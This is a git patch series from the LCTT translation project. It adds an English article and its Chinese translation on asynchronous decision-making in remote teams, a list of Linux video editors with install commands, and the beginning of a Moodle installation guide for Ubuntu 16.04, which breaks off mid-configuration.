5b02d875120d785c4f9867b61c59b117b2d08324 Mon Sep 17 00:00:00 2001 From: darksun Date: Tue, 19 Dec 2017 12:57:31 +0800 Subject: [PATCH 0702/1627] =?UTF-8?q?update=20at=202017=E5=B9=B4=2012?= =?UTF-8?q?=E6=9C=88=2019=E6=97=A5=20=E6=98=9F=E6=9C=9F=E4=BA=8C=2012:57:3?= =?UTF-8?q?1=20CST?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...on-making- Helping remote teams succeed.md | 57 ------------------- ...on-making- Helping remote teams succeed.md | 56 ++++++++++++++++++ 2 files changed, 56 insertions(+), 57 deletions(-) delete mode 100644 sources/tech/20171212 Asynchronous decision-making- Helping remote teams succeed.md create mode 100644 translated/tech/20171212 Asynchronous decision-making- Helping remote teams succeed.md diff --git a/sources/tech/20171212 Asynchronous decision-making- Helping remote teams succeed.md b/sources/tech/20171212 Asynchronous decision-making- Helping remote teams succeed.md deleted file mode 100644 index e81a06796d..0000000000 --- a/sources/tech/20171212 Asynchronous decision-making- Helping remote teams succeed.md +++ /dev/null @@ -1,57 +0,0 @@ -translating by lujun9972 -Asynchronous decision-making: Helping remote teams succeed -====== -Asynchronous decision-making is a strategy that enables geographically and culturally distributed software teams to make decisions more efficiently. In this article, I'll discuss some of the principles and tools that make this approach possible. - -Synchronous decision-making, in which participants interact with each other in real time, can be expensive for people who work on a [Maker's Schedule][1], and they are often impractical for remote teams. We've all seen how such meetings can devolve into inefficient time wasters that we all dread and avoid. - -In contrast, asynchronous decision-making, which is often used in large open source projects--for example, at the Apache Software Foundation (ASF), where I'm most active--provides an efficient way for teams to move forward with minimal meetings. Many open source projects involve only a few meetings each year (and some none at all), yet development teams consistently produce high-quality software. - -How does asynchronous decision-making work? - -## Required tools - -### Central asynchronous communications channel - -The first thing you need to enable asynchronous decision-making is a central asynchronous communications channel. The technology you use must enable all team members to get the same information and hold threaded discussions, where you can branch off on a topic while ignoring other topics being discussed on the same channel. Think of marine radio, in which a broadcast channel is used sparingly to get the attention of specific people, who then branch off to a sub-channel to have more detailed discussions. - -Many open source projects still use mailing lists as this central channel, although younger software developers might consider this approach old and clunky. Mailing lists require a lot of discipline to efficiently manage the high traffic of a busy project, particularly when it comes to meaningful quoting, sticking to one topic per thread, and making sure [subject lines are relevant][2]. Still, when used properly and coupled with an indexed archive, mailing lists remain the most ubiquitous tool to create a central channel. - -Corporate teams might benefit from more modern collaboration tools, which can be easier to use and provide stronger multimedia features. Regardless of which tools you use, the key is to create a channel in which large groups of people can communicate efficiently and asynchronously on a wide variety of topics. A [busy channel is often preferable to multiple channels][3] to create a consistent and engaged community. - -### Consensus-building mechanism - -The second tool is a mechanism for building consensus so you can avoid deadlocks and ensure that decisions go forward. Unanimity in decision-making is ideal, but consensus, defined as "widespread agreement among people who have decision power," is second-best. Requiring unanimity or allowing vetoes in decision-making can block progress, so at the ASF vetoes apply only to a very limited set of decision types. The [ASF's voting rules][4] constitute a well-established and often-emulated approach to building consensus in loosely coupled teams which, like the ASF, may have no single boss. They can also be used when consensus doesn't emerge naturally. - -### Case management system - -Building consensus usually happens on the project's central channel, as described above. But for complex topics, it often makes sense to use a third tool: a case management system. Groups can then focus the central channel on informal discussions and brainstorming, then move to a more structured case management system when a discussion evolves into a decision. - -The case management system organizes decisions more precisely. Smaller teams with fewer decisions to make could work without one, but many find it convenient to be able to discuss the details of a given decision and keep associated information in a single, relatively isolated place. - -A case management system does not require complex software; at the ASF we use simple issue trackers, web-based systems originally created for software support and bug management. Each case is handled on a single web page, with a history of comments and actions. This approach works well for keeping track of decisions and the paths that lead to them. Some non-urgent or complex decisions can take a long time to reach closure, for example, and it's useful to have their history in a single place. New team members can also get up to speed quickly by learning which decisions were made most recently, which remain outstanding, who's involved in each one, and the background behind each decision. - -## Success stories - -The nine members of ASF's board of directors make a few dozen decisions at each monthly phone meeting, which last less than two hours. We carefully prepare for these meetings by making most of our decisions asynchronously in advance. This allows us to focus the meeting on the complex or uncertain issues rather than the ones that already have full or partial consensus. - -An interesting example outside of the software world is the [Swiss Federal Council's weekly meeting][5], which runs in a way similar to ASF. Teams prepare for the meeting by using asynchronous decision-making to build consensus. The meeting agenda consists of a set of color-coded lists that indicate which items can be approved quickly, which need more discussion, and which are expected to be most complex. This allows seven busy people to make more than 2,500 decisions each year, in about 50 weekly sessions of a few hours each. Sounds pretty efficient to me. - -In my experience, the benefits of asynchronous decision-making are well worth the investment in time and tools. It also leads to happier team members, which is a key component of success. - --------------------------------------------------------------------------------- - -via: https://opensource.com/article/17/12/asynchronous-decision-making - -作者:[Bertrand Delacretaz][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://opensource.com -[1]:http://www.paulgraham.com/makersschedule.html -[2]:https://grep.codeconsult.ch/2017/11/10/large-mailing-lists-survival-guide/ -[3]:https://grep.codeconsult.ch/2011/12/06/stefanos-mazzocchis-busy-list-pattern/ -[4]:http://www.apache.org/foundation/voting.html -[5]:https://www.admin.ch/gov/en/start/federal-council/tasks/decision-making/federal-council-meeting.html diff --git a/translated/tech/20171212 Asynchronous decision-making- Helping remote teams succeed.md b/translated/tech/20171212 Asynchronous decision-making- Helping remote teams succeed.md new file mode 100644 index 0000000000..8731c2c084 --- /dev/null +++ b/translated/tech/20171212 Asynchronous decision-making- Helping remote teams succeed.md @@ -0,0 +1,56 @@ +异步决策:帮助远程团队走向成功 +====== +异步决策能够让地理和文化上分散的软件团队更有效率地做出决策。本文就将讨论一下实现异步决策所需要的一些原则和工具。 + +同步决策,要求参与者实时地进行互动,而这对那些需要大块完整时间工作 ([Maker's Schedule][1]) 的人来说代价非常大,而且对于远程团队来说这也不现实。我们会发现这种会议最后浪费的时间让人难以置信。 + +相比之下,异步决策常应用于大型开源项目中(比如我常参与的像 Apache Software Foundation (ASF))。它为团队提供了一种尽可能少开会的有效方法。很多开源项目每年只开很少的几次会议(有的甚至完全没开过会),然而开发团队却始终如一地在生产高质量的软件。 + +怎样才能异步决策呢? + +## 所需工具 + +### 中心化的异步沟通渠道 + +异步决策的第一步就是构建一个中心化的异步沟通渠道。你所使用的技术必须能让所有的团队成员都获得同样的信息,并能进行线索讨论 (threaded discussions),也就是说你要既能对一个主题进行发散也要能封禁其他主题的讨论。想一想 marine 广播,其中广播渠道的作用只是为了引起特定人员的注意,这些人然后再创建一个子渠道来进行详细的讨论。 + +很多开源项目依旧使用邮件列表 (mailing lists) 作为中心渠道,不过很多新一代的软件开发者可能会觉得这个方法又古老有笨拙。邮件列表需要遵循大量的准则才能有效的管理热门项目,比如你需要进行有意义的引用,每个 thead 只讨论一个主题,保证 [标题与内容相吻合 ][2]。虽然这么麻烦,但使用得当的话,再加上一个经过索引的归档系统,邮件列表依然在创建中心渠道的工具中占据绝对主导的地位。 + +公司团队可以从一个更加现代化的协作工具中收益,这类工具更易使用并提供了更加强大的多媒体功能。不管你用的是哪个工具,关键在于要创建一个能让大量的人员有效沟通并异步地讨论各种主题的渠道。要创建一个一致而活跃的社区,使用一个 [繁忙的渠道要好过建立多个渠道 ][3] to create a consistent and engaged community。 + +### 构建共识的机制 + +第二个工具是一套构建共识的机制,这样你才不会陷入死循环从而确保能做出决策。做决策最理想的情况就是一致同意,而次佳的就是达成共识,也就是 "有决策权的人之间广泛形成了一致的看法"。强求完全一致的赞同或者允许一票否决都会阻碍决策的制定,因此 ASF 中只在非常有限的决策类似中允许否决权。[ASF 投票制度 ][4] 为类似 ASF 这样没有大老板的松散组织构建了一个久经考验的,用于达成共识的好方法。当共识无法自然产生时也可以使用该套制度。 + +### 案例管理系统 + +如上所述,我们通常在项目的中心渠道中构建共识。但是在讨论一些复杂的话题时,使用案例管理系统这一第三方的工具很有意义。小组可以使用中心渠道专注于非正式的讨论和头脑风暴上,当讨论要转变成一个决策时将其转到一个更加结构化的案例管理系统中去。 + +案例管理系统能够更精确地组织决策。小型团队不用做太多决策可以不需要它,但很多团队会发现能有一个相对独立的地方讨论决策的细节并保存相关信息会方便很多。 + +案例管理系统不一定就是个很复杂的软件; 在 ASF 中我们所使用的只是简单的问题跟踪软件而已,这些给予 web 的系统原本是创建来进行软件支持和 bug 管理的。每个案例列在一个单独的 web 页面上,还有一些历史的注释和动作信息。该途径可以很好的追踪决策是怎么制定出来的。比如,某些非紧急的决策或者复杂的决策可能会花很长时间才会制定出来,这时有一个地方能够了解这些决策的历史就很有用了。新来的团队成员也能很快地了解到最近做出了哪些决策,哪些决策还在讨论,每个决策都有那些人参与其中,每个决策的背景是什么。 + +## 成功的案例 + +ASF 董事会中的九名懂事在每个月的电话会议上只做很少的一些决策,耗时不超过 2 个小时。在准备这些会议之前大多数的决策都预先通过异步的方式决定好了。这使得我们可以在会议上集中讨论复杂和难以确定的问题,而不是他论那些已经达成普遍/部分共识的问题上。 + +软件世界外的一个有趣的案例是 [瑞士联邦委员会的周会 ][5],它的运作方式跟 ASF 很类似。团队以异步决策构建共识的方式来准备会议。会议议程由一组不同颜色编码的列表组成,这些颜色标识了那些事项可以很快通过批准,那些事项需要进一步的讨论,哪些事项特别的复杂。这使得只要 7 个人就能每年忙完超过 2500 项决策,共 50 个周会,每个周会只需要几个小时时间。我觉得这个效率已经很高了。 + +就我的经验来看,异步决策带来的好处完全值得上为此投入的时间和工具。而且它也能让团队成员更快乐,这也是成功的关键因素之一。 + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/17/12/asynchronous-decision-making + +作者:[Bertrand Delacretaz][a] +译者:[lujun9972](https://github.com/lujun9972) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com +[1]:http://www.paulgraham.com/makersschedule.html +[2]:https://grep.codeconsult.ch/2017/11/10/large-mailing-lists-survival-guide/ +[3]:https://grep.codeconsult.ch/2011/12/06/stefanos-mazzocchis-busy-list-pattern/ +[4]:http://www.apache.org/foundation/voting.html +[5]:https://www.admin.ch/gov/en/start/federal-council/tasks/decision-making/federal-council-meeting.html From 80cc8107cdcfd6c0ef1cb270fc7b66522addecec Mon Sep 17 00:00:00 2001 From: darksun Date: Tue, 19 Dec 2017 14:04:59 +0800 Subject: [PATCH 0703/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=209=20Best=20Free?= =?UTF-8?q?=20Video=20Editing=20Software=20for=20Linux=20In=202017?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...ideo Editing Software for Linux In 2017.md | 514 ++++++++++++++++++ 1 file changed, 514 insertions(+) create mode 100644 sources/tech/20160627 9 Best Free Video Editing Software for Linux In 2017.md diff --git a/sources/tech/20160627 9 Best Free Video Editing Software for Linux In 2017.md b/sources/tech/20160627 9 Best Free Video Editing Software for Linux In 2017.md new file mode 100644 index 0000000000..df3bf2064e --- /dev/null +++ b/sources/tech/20160627 9 Best Free Video Editing Software for Linux In 2017.md @@ -0,0 +1,514 @@ +9 Best Free Video Editing Software for Linux In 2017 +====== +**Brief: Here are best video editors for Linux, their feature, pros and cons and how to install them on your Linux distributions.** + +![Best Video editors for Linux][1] + +![Best Video editors for Linux][2] + +We have discussed [best photo management applications for Linux][3], [best code editors for Linux][4] in similar articles in the past. Today we shall see the **best video editing software for Linux**. + +When asked about free video editing software, Windows Movie Maker and iMovie is what most people often suggest. + +Unfortunately, both of them are not available for GNU/Linux. But you don't need to worry about it, we have pooled together a list of **best free video editors** for you. + +## Best Video Editors for Linux + +Let's have a look at the best free video editing software for Linux below. Here's a quick summary if you think the article is too long to read. You can click on the links to jump to the relevant section of the article: + +Video Editors Main Usage Type Kdenlive General purpose video editing Free and Open Source OpenShot General purpose video editing Free and Open Source Shotcut General purpose video editing Free and Open Source Flowblade General purpose video editing Free and Open Source Lightworks Professional grade video editing Freemium Blender Professional grade 3D editing Free and Open Source Cinelerra General purpose video editing Free and Open Source DaVinci Resolve Professional grade video editing Freemium VidCutter Simple video split and merge Free and Open Source + +### 1\. Kdenlive + +![Kdenlive-free video editor on ubuntu][1] + +![Kdenlive-free video editor on ubuntu][5] +[Kdenlive][6] is a free and [open source][7] video editing software from [KDE][8] that provides support for dual video monitors, a multi-track timeline, clip list, customizable layout support, basic effects, and basic transitions. + +It supports a wide variety of file formats and a wide range of camcorders and cameras including Low resolution camcorder (Raw and AVI DV editing), Mpeg2, mpeg4 and h264 AVCHD (small cameras and camcorders), High resolution camcorder files, including HDV and AVCHD camcorders, Professional camcorders, including XDCAM-HD™ streams, IMX™ (D10) streams, DVCAM (D10) , DVCAM, DVCPRO™, DVCPRO50™ streams and DNxHD™ streams. + +If you are looking for an iMovie alternative for Linux, Kdenlive would be your best bet. + +#### Kdenlive features + + * Multi-track video editing + * A wide range of audio and video formats + * Configurable interface and shortcuts + * Easily create tiles using text or images + * Plenty of effects and transitions + * Audio and video scopes make sure the footage is correctly balanced + * Proxy editing + * Automatic save + * Wide hardware support + * Keyframeable effects + + + +#### Pros + + * All-purpose video editor + * Not too complicated for those who are familiar with video editing + + + +#### Cons + + * It may still be confusing if you are looking for something extremely simple + * KDE applications are infamous for being bloated + + + +#### Installing Kdenlive + +Kdenlive is available for all major Linux distributions. You can simply search for it in your software center. Various packages are available in the [download section of Kdenlive website][9]. + +Command line enthusiasts can install it from the terminal by running the following command in Debian and Ubuntu-based Linux distributions: +``` +sudo apt install kdenlive +``` + +### 2\. OpenShot + +![Openshot-free-video-editor-on-ubuntu][1] + +![Openshot-free-video-editor-on-ubuntu][10] + +[OpenShot][11] is another multi-purpose video editor for Linux. OpenShot can help you create videos with transitions and effects. You can also adjust audio levels. Of course, it support of most formats and codecs. + +You can also export your film to DVD, upload to YouTube, Vimeo, Xbox 360, and many common video formats. OpenShot is a tad bit simpler than Kdenlive. So if you need a video editor with a simple UI OpenShot is a good choice. + +There is also a neat documentation to [get you started with OpenShot][12]. + +#### OpenShot features + + * Cross-platform, available on Linux, macOS, and Windows + * Support for a wide range of video, audio, and image formats + * Powerful curve-based Keyframe animations + * Desktop integration with drag and drop support + * Unlimited tracks or layers + * Clip resizing, scaling, trimming, snapping, rotation, and cutting + * Video transitions with real-time previews + * Compositing, image overlays and watermarks + * Title templates, title creation, sub-titles + * Support for 2D animation via image sequences + * 3D animated titles and effects + * SVG friendly for creating and including vector titles and credits + * Scrolling motion picture credits + * Frame accuracy (step through each frame of video) + * Time-mapping and speed changes on clips + * Audio mixing and editing + * Digital video effects, including brightness, gamma, hue, greyscale, chroma key etc + + + +#### Pros + + * All-purpose video editor for average video editing needs + * Available on Windows and macOS along with Linux + + + +#### Cons + + * It may be simple but if you are extremely new to video editing, there is definitely a learning curve involved here + * You may still not find up to the mark of a professional-grade, movie making editing software + + + +#### Installing OpenShot + +OpenShot is also available in the repository of all major Linux distributions. You can simply search for it in your software center. You can also get it from its [official website][13]. + +My favorite way is to use the following command in Debian and Ubuntu-based Linux distributions: +``` +sudo apt install openshot +``` + +### 3\. Shotcut + +![Shotcut Linux video editor][1] + +![Shotcut Linux video editor][14] + +[Shotcut][15] is another video editor for Linux that can be put in the same league as Kdenlive and OpenShot. While it does provide similar features as the other two discussed above, Shotcut is a bit advanced with support for 4K videos. + +Support for a number of audio, video format, transitions and effects are some of the numerous features of Shotcut. External monitor is also supported here. + +There is a collection of video tutorials to [get you started with Shotcut][16]. It is also available for Windows and macOS so you can use your learning on other operating systems as well. + +#### Shotcut features + + * Cross-platform, available on Linux, macOS, and Windows + * Support for a wide range of video, audio, and image formats + * Native timeline editing + * Mix and match resolutions and frame rates within a project + * Audio filters, mixing and effects + * Video transitions and filters + * Multitrack timeline with thumbnails and waveforms + * Unlimited undo and redo for playlist edits including a history view + * Clip resizing, scaling, trimming, snapping, rotation, and cutting + * Trimming on source clip player or timeline with ripple option + * External monitoring on an extra system display/monitor + * Hardware support + + + +You can read about more features [here][17]. + +#### Pros + + * All-purpose video editor for common video editing needs + * Support for 4K videos + * Available on Windows and macOS along with Linux + + + +#### Cons + + * Too many features reduce the simplicity of the software + + + +#### Installing Shotcut + +Shotcut is available in [Snap][18] format. You can find it in Ubuntu Software Center. For other distributions, you can get the executable file from its [download page][19]. + +### 4\. Flowblade + +![Flowblade movie editor on ubuntu][1] + +![Flowblade movie editor on ubuntu][20] + +[Flowblade][21] is a multitrack non-linear video editor for Linux. Like the above-discussed ones, this too is a free and open source software. It comes with a stylish and modern user interface. + +Written in Python, it is designed to provide a fast, and precise. Flowblade has focused on providing the best possible experience on Linux and other free platforms. So there's no Windows and OS X version for now. Feels good to be a Linux exclusive. + +You also get a decent [documentation][22] to help you use all of its features. + +#### Flowblade features + + * Lightweight application + * Provide simple interface for simple tasks like split, merge, overwrite etc + * Plenty of audio and video effects and filters + * Supports [proxy editing][23] + * Drag and drop support + * Support for a wide range of video, audio, and image formats + * Batch rendering + * Watermarks + * Video transitions and filters + * Multitrack timeline with thumbnails and waveforms + + + +You can read about more [Flowblade features][24] here. + +#### Pros + + * Lightweight + * Good for general purpose video editing + + + +#### Cons + + * Not available on other platforms + + + +#### Installing Flowblade + +Flowblade should be available in the repositories of all major Linux distributions. You can install it from the software center. More information is available on its [download page][25]. + +Alternatively, you can install Flowblade in Ubuntu and other Ubuntu based systems, using the command below: +``` +sudo apt install flowblade +``` + +### 5\. Lightworks + +![Lightworks running on ubuntu 16.04][1] + +![Lightworks running on ubuntu 16.04][26] + +If you looking for a video editor software that has more feature, this is the answer. [Lightworks][27] is a cross-platform professional video editor, available for Linux, Mac OS X and Windows. + +It is an award-winning professional [non-linear editing][28] (NLE) software that supports resolutions up to 4K as well as video in SD and HD formats. + +Lightworks is available for Linux, however, it is not open source. + +This application has two versions: + + * Lightworks Free + * Lightworks Pro + + + +Pro version has more features such as higher resolution support, 4K and Blue Ray support etc. + +Extensive documentation is available on its [website][29]. You can also refer to videos at [Lightworks video tutorials page][30] + +#### Lightworks features + + * Cross-platform + * Simple & intuitive User Interface + * Easy timeline editing & trimming + * Real-time ready to use audio & video FX + * Access amazing royalty-free audio & video content + * Lo-Res Proxy workflows for 4K + * Export video for YouTube/Vimeo, SD/HD, up to 4K + * Drag and drop support + * Wide variety of audio and video effects and filters + + + +#### Pros + + * Professional, feature-rich video editor + + + +#### Cons + + * Limited free version + + + +#### Installing Lightworks + +Lightworks provides DEB packages for Debian and Ubuntu-based Linux distributions and RPM packages for Fedora-based Linux distributions. You can find the packages on its [download page][31]. + +### 6\. Blender + +![Blender running on Ubuntu 16.04][1] + +![Blender running on Ubuntu 16.04][32] + +[Blender][33] is a professional, industry-grade open source, cross-platform video editor. It is popular for 3D works. Blender has been used in several Hollywood movies including Spider Man series. + +Although originally designed for produce 3D modeling, but it can also be used for video editing and input capabilities with a variety of formats. + +#### Blender features + + * Live preview, luma waveform, chroma vectorscope and histogram displays + * Audio mixing, syncing, scrubbing and waveform visualization + * Up to 32 slots for adding video, images, audio, scenes, masks and effects + * Speed control, adjustment layers, transitions, keyframes, filters and more + + + +You can read about more features [here][34]. + +#### Pros + + * Cross-platform + * Professional grade editing + + + +#### Cons + + * Complicated + * Mainly for 3D animation, not focused on regular video editing + + + +#### Installing Blender + +The latest version of Blender can be downloaded from its [download page][35]. + +### 7\. Cinelerra + +![Cinelerra video editor for Linux][1] + +![Cinelerra video editor for Linux][36] + +[Cinelerra][37] has been available since 1998 and has been downloaded over 5 million times. It was the first video editor to provide non-linear editing on 64-bit systems back in 2003. It was a go-to video editor for Linux users at that time but it lost its sheen afterward as some developers abandoned the project. + +Good thing is that its back on track and is being developed actively again. + +There is some [interesting backdrop story][38] about how and why Cinelerra was started if you care to read. + +#### Cinelerra features + + * Non-linear editing + * Support for HD videos + * Built-in frame renderer + * Various video effects + * Unlimited layers + * Split pane editing + + + +#### Pros + + * All-purpose video editor + + + +#### Cons + + * Not suitable for beginners + * No packages available + + + +#### Installing Cinelerra + +You can download the source code from [SourceForge][39]. More information on its [download page][40]. + +### 8\. DaVinci Resolve + +![DaVinci Resolve video editor][1] + +![DaVinci Resolve video editor][41] + +If you want Hollywood level video editing, use the tool the professionals use in Hollywood. [DaVinci Resolve][42] from Blackmagic is what professionals are using for editing movies and tv shows. + +DaVinci Resolve is not your regular video editor. It's a full-fledged editing tool that provides editing, color correction and professional audio post-production in a single application. + +DaVinci Resolve is not open source. Like LightWorks, it too provides a free version for Linux. The pro version costs $300. + +#### DaVinci Resolve features + + * High-performance playback engine + * All kind of edit types such as overwrite, insert, ripple overwrite, replace, fit to fill, append at end + * Advanced Trimming + * Audio Overlays + * Multicam Editing allows editing footage from multiple cameras in real-time + * Transition and filter-effects + * Speed effects + * Timeline curve editor + * Non-linear editing for VFX + + + +#### Pros + + * Cross-platform + * Professional grade video editor + + + +#### Cons + + * Not suitable for average editing + * Not open source + * Some features are not available in the free version + + + +#### Installing DaVinci Resolve + +You can download DaVinci Resolve for Linux from [its website][42]. You'll have to register, even for the free version. + +### 9\. VidCutter + +![VidCutter video editor for Linux][1] + +![VidCutter video editor for Linux][43] + +Unlike all the other video editors discussed here, [VidCutter][44] is utterly simple. It doesn't do much except splitting videos and merging. But at times you just need this and VidCutter gives you just that. + +#### VidCutter features + + * Cross-platform app available for Linux, Windows and MacOS + * Supports most of the common video formats such as: AVI, MP4, MPEG 1/2, WMV, MP3, MOV, 3GP, FLV etc + * Simple interface + * Trims and merges the videos, nothing more than that + + + +#### Pros + + * Cross-platform + * Good for simple split and merge + + + +#### Cons + + * Not suitable for regular video editing + * Crashes often + + + +#### Installing VidCutter + +If you are using Ubuntu-based Linux distributions, you can use the official PPA: +``` +sudo add-apt-repository ppa:ozmartian/apps +sudo apt-get update +sudo apt-get install vidcutter +``` + +It is available in AUR so Arch Linux users can also install it easily. For other Linux distributions, you can find the installation files on its [GitHub page][45]. + +### Which is the best video editing software for Linux? + +A number of video editors mentioned here use [FFmpeg][46]. You can use FFmpeg on your own as well. It's a command line only tool so I didn't include it in the main list but it would have been unfair to not mention it at all. + +If you need an editor for simply cutting and joining videos, go with VidCutter. + +If you need something more than that, **OpenShot** or **Kdenlive** is a good choice. These are suitable for beginners and a system with standard specification. + +If you have a high-end computer and need advanced features you can go out with **Lightworks** or **DaVinci Resolve**. If you are looking for more advanced features for 3D works, **Blender** has got your back. + +So that's all I can write about the ** best video editing software for Linux** such as Ubuntu, Linux Mint, Elementary, and other Linux distributions. Share with us which video editor you like the most. + +-------------------------------------------------------------------------------- + +via: https://itsfoss.com/best-video-editing-software-linux/ + +作者:[It'S Foss Team][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://itsfoss.com/author/itsfoss/ +[1]:data:image/gif;base64,R0lGODdhAQABAPAAAP///wAAACwAAAAAAQABAEACAkQBADs= +[2]:https://itsfoss.com/wp-content/uploads/2016/06/best-Video-editors-Linux-800x450.png +[3]:https://itsfoss.com/linux-photo-management-software/ +[4]:https://itsfoss.com/best-modern-open-source-code-editors-for-linux/ +[5]:https://itsfoss.com/wp-content/uploads/2016/06/kdenlive-free-video-editor-on-ubuntu.jpg +[6]:https://kdenlive.org/ +[7]:https://itsfoss.com/tag/open-source/ +[8]:https://www.kde.org/ +[9]:https://kdenlive.org/download/ +[10]:https://itsfoss.com/wp-content/uploads/2016/06/openshot-free-video-editor-on-ubuntu.jpg +[11]:http://www.openshot.org/ +[12]:http://www.openshot.org/user-guide/ +[13]:http://www.openshot.org/download/ +[14]:https://itsfoss.com/wp-content/uploads/2016/06/shotcut-video-editor-linux-800x503.jpg +[15]:https://www.shotcut.org/ +[16]:https://www.shotcut.org/tutorials/ +[17]:https://www.shotcut.org/features/ +[18]:https://itsfoss.com/use-snap-packages-ubuntu-16-04/ +[19]:https://www.shotcut.org/download/ +[20]:https://itsfoss.com/wp-content/uploads/2016/06/flowblade-movie-editor-on-ubuntu.jpg +[21]:http://jliljebl.github.io/flowblade/ +[22]:https://jliljebl.github.io/flowblade/webhelp/help.html +[23]:https://jliljebl.github.io/flowblade/webhelp/proxy.html +[24]:https://jliljebl.github.io/flowblade/features.html +[25]:https://jliljebl.github.io/flowblade/download.html +[26]:https://itsfoss.com/wp-content/uploads/2016/06/lightworks-running-on-ubuntu-16.04.jpg +[27]:https://www.lwks.com/ +[28]:https://en.wikipedia.org/wiki/Non-linear_editing_system +[29]:https://www.lwks.com/index.php?option=com_lwks&view=download&Itemid=206&tab=4 +[30]:https://www.lwks.com/videotutorials +[31]:https://www.lwks.com/index.php?option=com_lwks&view=download&Itemid=206&tab=1 +[32]:https://itsfoss.com/wp-content/uploads/2016/06/blender-running-on-ubuntu-16.04.jpg +[33]:https://www.blender.org/ +[34]:https://www.blender.org/features/ +[35]:https://www.blender.org/download/ +[36]:https://itsfoss.com/wp-content/uploads/2016/06/cinelerra-screenshot.jpeg +[37]:http://cinelerra.org/ +[38]:http://cinelerra.org/our-story +[39]:https://sourceforge.net/projects/heroines/files/cinelerra-6-src.tar.xz/download +[40]:http://cinelerra.org/download +[41]:https://itsfoss.com/wp-content/uploads/2016/06/davinci-resolve-vdeo-editor-800x450.jpg +[42]:https://www.blackmagicdesign.com/products/davinciresolve/ +[43]:https://itsfoss.com/wp-content/uploads/2016/06/vidcutter-screenshot-800x585.jpeg +[44]:https://itsfoss.com/vidcutter-video-editor-linux/ +[45]:https://github.com/ozmartian/vidcutter/releases +[46]:https://www.ffmpeg.org/ From 14cd000aae7c3820750ecf0f2b101e6fdbcc33dd Mon Sep 17 00:00:00 2001 From: darksun Date: Tue, 19 Dec 2017 14:33:13 +0800 Subject: [PATCH 0704/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20to=20Inst?= =?UTF-8?q?all=20Moodle=20on=20Ubuntu=2016.04?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...4 How to Install Moodle on Ubuntu 16.04.md | 173 ++++++++++++++++++ 1 file changed, 173 insertions(+) create mode 100644 sources/tech/20171214 How to Install Moodle on Ubuntu 16.04.md diff --git a/sources/tech/20171214 How to Install Moodle on Ubuntu 16.04.md b/sources/tech/20171214 How to Install Moodle on Ubuntu 16.04.md new file mode 100644 index 0000000000..8cd5d5fdd8 --- /dev/null +++ b/sources/tech/20171214 How to Install Moodle on Ubuntu 16.04.md @@ -0,0 +1,173 @@ +How to Install Moodle on Ubuntu 16.04 +====== +![How to Install Moodle on Ubuntu 16.04][1] + +Step-by-step Installation Guide on how to Install Moodle on Ubuntu 16.04. Moodle (acronym of Modular-object-oriented dynamic learning environment') is a free and open source learning management system built to provide teachers, students and administrators single personalized learning environment. Moodle is built by the Moodle project which is led and coordinated by [Moodle HQ][2] + +, + +**Moodle comes with a lot of useful features such as:** + + * Modern and easy to use interface + * Personalised Dashboard + * Collaborative tools and activities + * All-in-one calendar + * Simple text editor + * Track progress + * Notifications + * and many more… + + + +In this tutorial we will guide you through the steps of installing the latest version of Moodle on an Ubuntu 16.04 VPS with Apache web server, MySQL and PHP 7. + +### 1. Login via SSH + +First of all, login to your Ubuntu 16.04 VPS via SSH as user root + +### 2. Update the OS Packages + +Run the following command to update the OS packages and install some dependencies +``` +apt-get update && apt-get upgrade +apt-get install git-core graphviz aspell +``` + +### 3. Install Apache Web Server + +Install Apache web server from the Ubuntu repository +``` +apt-get install apache2 +``` + +### 4. Start Apache Web Server + +Once it is installed, start Apache and enable it to start automatically upon system boot +``` +systemctl enable apache2 +``` + +### 5. Install PHP 7 + +Next, we will install PHP 7 and some additional PHP modules required by Moodle +``` +apt-get install php7.0 libapache2-mod-php7.0 php7.0-pspell php7.0-curl php7.0-gd php7.0-intl php7.0-mysql php7.0-xml php7.0-xmlrpc php7.0-ldap php7.0-zip +``` + +### 6. Install and Configure MySQL Database Server + +Moodle stores most of its data in a database, so we will install MySQL database server +``` +apt-get install mysql-client mysql-server +``` + +After the installation, run the `mysql_secure_installation` script to set your MySQL root password and secure your MySQL installation. + +Login to the MySQL server as user root and create a user and database for the Moodle installation +``` +mysql -u root -p +mysql> CREATE DATABASE moodle; +mysql> GRANT ALL PRIVILEGES ON moodle.* TO 'moodleuser'@'localhost' IDENTIFIED BY 'PASSWORD'; +mysql> FLUSH PRIVILEGES; +mysql> \q +``` + +Don't forget to replace 'PASSWORD' with an actual strong password. + +### 7. Get Moodle from GitHub repository + +Next, change the current working directory and clone Moodle from their official GitHub repository +``` +cd /var/www/html/ +git clone https://github.com/moodle/moodle.git +``` + +Go to the '/moodle' directory and check all available branches +``` +cd moodle/ +git branch -a +``` + +Select the latest stable version (currently it is MOODLE_34_STABLE) and run the following command to tell git which branch to track or use +``` +git branch --track MOODLE_34_STABLE origin/MOODLE_34_STABLE +``` + +and checkout the specified version +``` +git checkout MOODLE_34_STABLE + +Switched to branch 'MOODLE_34_STABLE' +Your branch is up-to-date with 'origin/MOODLE_34_STABLE'. +``` + +Create a directory for the Moodle data +``` +mkdir /var/moodledata +``` + +Set the correct ownership and permissions +``` +chown -R www-data:www-data /var/www/html/moodle +chown www-data:www-data /var/moodledata +``` + +### 8. Configure Apache Web Server + +Create Apache virtual host for your domain name with the following content +``` +nano /etc/apache2/sites-available/yourdomain.com.conf + + ServerAdmin admin@yourdomain.com + DocumentRoot /var/www/html/moodle + ServerName yourdomain.com + ServerAlias www.yourdomain.com + + Options Indexes FollowSymLinks MultiViews + AllowOverride All + Order allow,deny + allow from all + + ErrorLog 